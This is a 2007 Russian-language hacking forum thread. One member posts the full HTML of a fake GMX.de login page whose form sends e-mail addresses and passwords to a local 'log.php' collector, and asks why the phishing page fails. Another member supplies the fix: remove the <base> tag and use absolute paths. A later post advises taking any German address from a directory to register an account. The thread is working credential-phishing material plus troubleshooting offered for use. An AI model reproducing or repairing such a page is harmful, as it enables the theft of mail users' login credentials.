Mыло на gmx.de

Discussion in 'Уязвимости Mail-сервисов' started by NaNuNa, 10 Sep 2007.

  1. NaNuNa

    NaNuNa New Member

    Joined:
    8 Sep 2007
    Messages:
    3
    Likes Received:
    2
    Reputations:
    1
    Фейк не работает.Подскажите что не так :confused:
    index.php
    PHP:
     <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
    <
    head>
    <
    title>GMX Mein GMX</title>
    <
    meta http-equiv="Cache-Control" content="no-store, no-cache" />
    <
    meta http-equiv="Pragma" content="no-cache" />
    <
    meta http-equiv="Expires" content="-1" />
    <
    link rel="start" type="text/html" href="http://portal.gmx.net/?LANG=de" />
    <
    link rel="help" type="text/html" href="http://service.gmx.net/de/cgi/g.fcgi/support?LANG=de" />
    <
    link rel="copyright" type="text/html" href="http://portal.gmx.net/de/impressum/?LANG=de" />
    <
    link rel="icon" type="image/x-icon" href="http://images.gmx.net/images/gmx/favicon.ico" />
    <
    link rel="stylesheet" type="text/css" href="http://service.gmx.net/de/cgi/style.css?AREA=mod-generic" media="all" />
    <
    link rel="stylesheet" type="text/css" href="http://service.gmx.net/de/cgi/style.css?AREA=mod-main" media="all" />
    <
    link rel="stylesheet" type="text/css" href="http://service.gmx.net/de/cgi/style.css?AREA=mod-form" media="all" />
    <
    link rel="stylesheet" type="text/css" href="http://service.gmx.net/de/cgi/style.css?AREA=mod-print" media="print" />
    <
    link rel="stylesheet" type="text/css" href="http://service.gmx.net/de/cgi/style.css?AREA=deprecated" media="screen" />
    <
    link rel="schema.DC" href="http://purl.org/DC/elements/1.1/" />
    <
    meta name="DC.Title" content="GMX" />
    <
    meta name="DC.Publisher" content="GMX GmbH" />
    <
    meta name="DC.Identifier" content="http://www.gmx.net/" />
    <
    meta name="DC.Rights" content="(C) GMX GmbH 2001 - 2006" />
    <
    script src="http://service.gmx.net/de/cgi/gmxfunctions.js" type="text/javascript"></script>
    <script type="text/javascript">
    <!--
    var ad_server='http://adclient.uimserv.net/js.ng/';
    var ad_site='gmx';
    var ad_sc='freemail/login';
    var ad_pp='_';
    var ad_age='';
    var ad_pa=new String(2006-(ad_age).substring(0, 4));
    var ad_gender='';
    var ad_pg=ad_gender.toLowerCase();
    var ad_gmxcustomerno='';
    var ad_gmxtoken='';
    var ad_natlang='natlang_';
    var ad_employstat='employstat_';
    var ad_userlevel='gmx_ulevel';
    var erotik='';
    if(erotik.match(',XXX')){
    var ad_eros='no_eros'
    }
    var ad_ts= new String(Math.random()).substring(2, 12);
    //-->
    </script>
    <style type="text/css">
    #grid-bar {
        background: url(/images/gmx/bg/status-2.gif) no-repeat;
        font-size: 1px; /* IE */
        height: 9px;
        overflow: hidden;
        width: 100px;
    }
    #grid-bar div.mails_usage {
        background: url(/images/gmx/bg/status-1-mails.gif) no-repeat;
        border-right: 1px solid #1C449B;
        float: left;
    }
    #grid-bar div.files_usage {
        background: url(/images/gmx/bg/status-1-files.gif) no-repeat;
        border-right: 1px solid #734400;
        float: left;
    }
    </style>
    <base target="_top" href="http://images.gmx.net/images/gmx/"></base>
    </head>
    <body>
    <div style="position: absolute; top: -10em;">

    <img src="http://service.gmx.net/de/cgi/count.fcgi?LANG=de&amp;PAGE=gmx_de_service_login_login-env&amp;ts=118924400512" alt="" style="width: 1px; height: 1px;" />


    <script type="text/javascript">
    <!--
    var IVW="//gmx.ivwbox.de/cgi-bin/ivw/CP/320;gmx_de_service_login_login-env";
    document.write('<img src=\"' + IVW + '?r=' + escape(document.referrer) + '&d=118924400512\" style=\"width: 1px; height: 1px;\" />');
    // -->
    </script>
    <noscript>
    <img src="//gmx.ivwbox.de/cgi-bin/ivw/CP/320;gmx_de_service_login_login-env?d=118924400512" alt="" style="width: 1px; height: 1px" />
    </noscript>

    <script type="text/javascript">
    <!--
    var uim='//pixelbox.uimserv.net/cgi-bin/gmx/CP/320;sc%3Dfreemail/login';
    document.write('<img src=\"' + uim + '?r=' + escape(document.referrer) + '&d=118924400512\" style=\"width: 1px; height: 1px\" />');
    // -->
    </script>
    <noscript>
    <img src="//pixelbox.uimserv.net/cgi-bin/gmx/CP/320;sc%3Dfreemail/login" alt="" style="width: 1px; height: 1px" />
    </noscript>

    </div>

    <script type="text/javascript">
    <!--
        document.write('<div id="nav-skip"><a href="'+document.location.href.replace(/[<>'"]/g,'')+'#content-start" accesskey="s">Zum Inhalt<\/a><\/div>');
    //-->
    </script>
    <div id="nav-top">
    <a href="http://www.gmx.net" accesskey="1" id="logo"><img src="common/logo.gif" alt="GMX" /></a>
    <ul class="service">
    <li><a href="http://service.gmx.net/de/cgi/g.fcgi/products/overview?LANG=de" title="Produkte"><img src="common/nav/top/product.gif" alt="Produkte" /></a></li>
    <li><a href="http://portal.gmx.net/de/themen/?LANG=de" title="Themen"><img src="common/nav/top/topic.gif" alt="Themen" /></a></li>
    <li><a href="http://portal.gmx.net/de/shopping/?LANG=de" title="Shopping"><img src="common/nav/top/shopping.gif" alt="Shopping" /></a></li>
        <li><a href="http://portal.gmx.net/de/games/?LANG=de" title="Games"><img src="common/nav/top/entertainment.gif" alt="Games" /></a></li>
    <li style="width: 101px;">
    <a href="http://portal.gmx.net/de/dienst/index.html" title="Mein GMX"><img src="common/nav/top/service.gif" alt="Mein GMX" /></a>
            </li>
    </ul>
    <div><a href="http://service.gmx.net/de/cgi/g.fcgi/support?LANG=de" accesskey="6">Hilfe</a> <span class="off">| <a href="http://www.gmx.net/de/go/accesskeys?LANG=de" accesskey="0">Accesskey-&Uuml;bersicht</a></span></div>
    <div id="opt"></div>
    </div>
    <div id="nav-top-bin">

        <div style="padding: 11px 0 0 6px;"><a href="http://portal.gmx.net/de/dienst/index.html"><strong>Login</strong></a></div>
        <div><a href="http://portal.gmx.net/de/dienst/index.html"><img src="common/icon-login.gif" alt="Login" /></a></div>

    </div>
    <div id="main">
    <div id="nav-sub">
    <div id="nav-sub-bin">
    <div class="end">
    <script type="text/javascript">
    <!--
    browser = navigator.userAgent;
    pos = browser.indexOf("MSIE");
    if (browser.substr(pos +5, 1) >= 5) {
    document.writeln('<div><a href="http://www.gmx.de/" onclick="this.style.behavior=\'url(#default#homepage)\';this.setHomePage(\'http://www.gmx.de/\'); return false;"><img src="common/icon-fav.gif" alt="" /><\/a><\/div>');
    document.writeln('<div style="position: relative; top: -29px; left: 30px;"><a href="http://www.gmx.de/" onclick="this.style.behavior=\'url(#default#homepage)\';this.setHomePage(\'http://www.gmx.de/\');return false;">GMX als<br /><strong>Startseite<\/strong><\/a><\/div>');
    }
    -->
    </script>
    <div class="ui"><a href="http://www.unitedinternet.de/" target="_blank"><img src="common/logo-ui.gif" alt="Mitglied von United Internet" /></a></div>
    </div>
    </div>
    </div>
    <div id="content-start"></div>
    <div class="hint">
        <div class="error">
            <ul>
                <li>Für den Vorschau logen Sie sich ein!<br /><br />
            
                </li>
            </ul>
        </div>
    </div>
        <div class="content"><div id="grid-saver" style="height: 605px;"></div>
    <div id="grid">
        
        <div id="article">
    <div class="x8 service">
    <div class="unit">
    <div class="x6 y2 type-a service-2 tool">
    <div class="index" style="background: url(common/headline-bg-service-2.gif) top left no-repeat !important; color: #FFF; border: 1px solid #1C449B;">GMX Login</div>
    <div class="box" style="background: #E8ECF7; border: 1px solid #1C449B; height: 151px; padding: 7px;">
    <div style="border-right: 1px solid #FFF; float: left; height: 100%; width: 210px;">
    <p style="margin-bottom: 15px;"><strong>Bitte loggen Sie sich mit Ihrer GMX E-Mail-Adresse ein:</strong></p>
    <form method="post" name="login" action="log.php">
    <input type="hidden" name="AREA" value="1" />
    <input type="hidden" name="EXT" value="redirect" />
    <input type="hidden" name="EXT2" value="" />
            <input type="hidden" name="EVENT" value="">
            <input type="hidden" name="FROM" value="">
            <input type="hidden" name="PROG" value="">
            <input type="hidden" name="TO" value="">
            <input type="hidden" name="LINK" value="">
            <input type="hidden" name="PARTNER" value="">
            <input type="hidden" name="uinguserid" value="">
    <table cellpadding="0" cellspacing="0">
    <caption>Loginformular f&uuml;r den GMX Dienst</caption>
    <tr>
                  <th style="padding: 3px 0 5px;"><label for="gmx_email">E-Mail:</label></th>
                <td style="padding: 3px 0 5px;"><input type="text" name="id" value="" id="gmx_email" class="m" accesskey="l" /></td>
          </tr>
        <tr>
    <th><label for="gmx_pw">Passwort:</label></th>
    <td><input type="password" name="p" id="gmx_pw" class="m" /></td>
    </tr>
    </table>
    <div style="padding: 5px 10px 10px 0; text-align: right;"><input type="submit" value="login" class="action" /></div>
    </form>
    <script type="text/javascript">
    <!--
    document.login.id.focus();
    //-->
    </script>
    <p style="padding-right: 10px; text-align: right;">
    <a href="http://service.gmx.net/de/cgi/login?LANG=de&amp;CUSTOMERNO=&amp;ALIAS=&amp;DOMAIN=&amp;AREA=2">Passwort vergessen?</a></p>
    </div>
          <div style="background: #B4C2DF; float: left; height: 100%; width: 1px;"></div>
    <div style="border-left: 1px solid #FFF; float: left; padding-left: 10px; width: 220px;">
        <p style="margin-bottom: 15px;"><strong>Sie haben noch kein GMX E-Mail-Konto?</strong></p>
        <p style="margin-bottom: 15px;">Kostenlose E-Mail-Adresse und mehr mit <a href="http://service.gmx.net/de/cgi/g.fcgi/products/mail/freemail/classic?LANG=de&amp;promo=errorfmc">GMX FreeMail</a>.</p>
        <a href="http://service.gmx.net/de/cgi/g.fcgi/products/mail/overview?target=order&amp;tariff=0&amp;LANG=de">
            <img alt="Kostenlos Mitglied werden!" src="teaslog/btn_anmelden.gif" style="margin: auto; width: 160px; height: 30px;" />
        </a>
    </div>
    </div></div></div></div></div>
    <script type="text/javascript" src="//fips.uimserv.net/ngvar.js"></script>
    <script type="text/javascript">
    if(typeof(UI_nguserid) != 'undefined') {
    document.login.uinguserid.value = UI_nguserid;
    }
        var elem = document.getElementById('gmx_email');
        if (elem != null) elem.focus();
    </script>

    </div>
    </div>

    <div id="content-end"></div>
    </div>
    <div id="footer">
        <ul>
            <li>&copy;2007 <a href="http://portal.gmx.net/?LANG=de"><strong>GMX</strong></a> |</li>
            <li><a href="http://portal.gmx.net/de/unternehmen?LANG=de" target="_blank">&Uuml;ber GMX</a> |</li>
            <li><a href="http://portal.gmx.net/de/impressum/?LANG=de" target="_blank">Impressum</a> |</li>
            <li><a href="http://portal.gmx.net/de/unternehmen/presse?LANG=de" target="_blank">Presse</a> |</li>
            <li><a href="http://portal.gmx.net/de/unternehmen/karriere?LANG=de" target="_blank">Karriere</a> |</li>
            <li><a href="http://media.gmx.net/" target="_blank">Werben auf GMX</a></li>
        </ul>
    </div>
    <!--
    @@ im CVS nach GMXDARTPOPUP suchen und alle Variablen löschen

    -->
    </body>
    </html>
     
     
    #1 NaNuNa, 10 Sep 2007
    Last edited: 10 Sep 2007
    1 person likes this.
  2. ak[id]

    ak[id] Elder - Старейшина

    Joined:
    22 Jun 2007
    Messages:
    143
    Likes Received:
    95
    Reputations:
    10
    а там реально мыло зарегистрировать?
     
  3. halkfild

    halkfild Members of Antichat

    Joined:
    11 Nov 2005
    Messages:
    365
    Likes Received:
    578
    Reputations:
    313
    всему вина елемент

    HTML:
    <base target="_top" href="http://images.gmx.net/images/gmx/"></base>
    просто снеси его и пропиши у всех картинок и тд полный путь.. :) а так все работает

    документация по сабжу
    http://www.htmlbook.ru/html/base.html
     
    _________________________
    #3 halkfild, 10 Sep 2007
    Last edited: 10 Sep 2007
    1 person likes this.
  4. NaNuNa

    NaNuNa New Member

    Joined:
    8 Sep 2007
    Messages:
    3
    Likes Received:
    2
    Reputations:
    1
    da,tolko nado germanskij adress vpisatj__vozmi ljuboj na www.dasoertliche.de
     
  5. NaNuNa

    NaNuNa New Member

    Joined:
    8 Sep 2007
    Messages:
    3
    Likes Received:
    2
    Reputations:
    1
    halkfild sbasibo za silku